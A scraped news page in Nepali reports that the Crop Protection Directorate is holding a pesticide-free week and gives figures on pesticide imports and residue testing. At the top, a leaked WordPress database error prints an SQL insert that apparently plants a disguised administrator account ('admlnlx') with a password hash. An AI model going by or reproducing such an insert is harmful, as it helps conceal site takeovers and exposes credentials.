WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B1dr2j/kHO5yFKf2kkf2RZWlOv2hht0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 19:49:31', '', 'admlnlx', 'admlnlx')
काठमाडौं, मंसिर १८–
कृषि विभाग, बाली संरक्षण निर्देशनालयले आज (शनिबार)देखि यही मङ्सिर २५ गतेसम्म विषादी प्रयोगमुक्त सप्ताह मनाउन सुरु गरेको छ ।
निर्देशनालयले शुक्रबार पत्रकार सम्मेलनको आयोजना गरी किसान, व्यापारी, उपभोक्ता लगायत सरोकार भएकाहरुलाई सचेत गर्ने उद्देश्यले सप्ताह मनाउन लागेको बताएको छ ।
नेपालमा भित्रिने विषादीमध्ये ८५ प्रतिशत तरकारी प्रणालीमा आधारित सघन खेती भएका स्थानमा प्रयोग भइरहेको निर्देशनालयका कार्यक्रम निर्देशक डिल्लीराम शर्माले बताए । उनले भने, “विभिन्न अध्ययनले विषादीको मात्रा तरकारी बालीमा बढी हुने गरेको देखाएको छ । ” गत वर्ष नेपालमा चार सय ५४.६ टन विषादी आयात भएको थियो ।
निर्देशनालयले उपभोक्ता र व्यापारी दुवैलाई सचेत गर्न दुई वर्ष पहिलेदेखि कालिमाटीमा फलफूल तथा तरकारीको अवशेष विश्लेषण सुरु गरेको थियो । शर्माले भने, “हामीले सुरु गर्दा तरकारी र फलफूलमा विषादीको मात्रा बढी पाइए पनि अहिले कम भएको छ । ”
सन् १९८४ मा भारतको भोपालमा विषादीको चुहावटबाट २० हजारको मृत्यु भएको स्मरण गर्दै विश्वभर सन् १९९८ देखि विषादी प्रयोगमुक्त दिनका रुपमा डिसेम्बर ३ लाई मनाउने गरिएको हो । नेपालमा भने यसलाई मनाउन लागिएको यस पटक चौथो वर्ष हो ।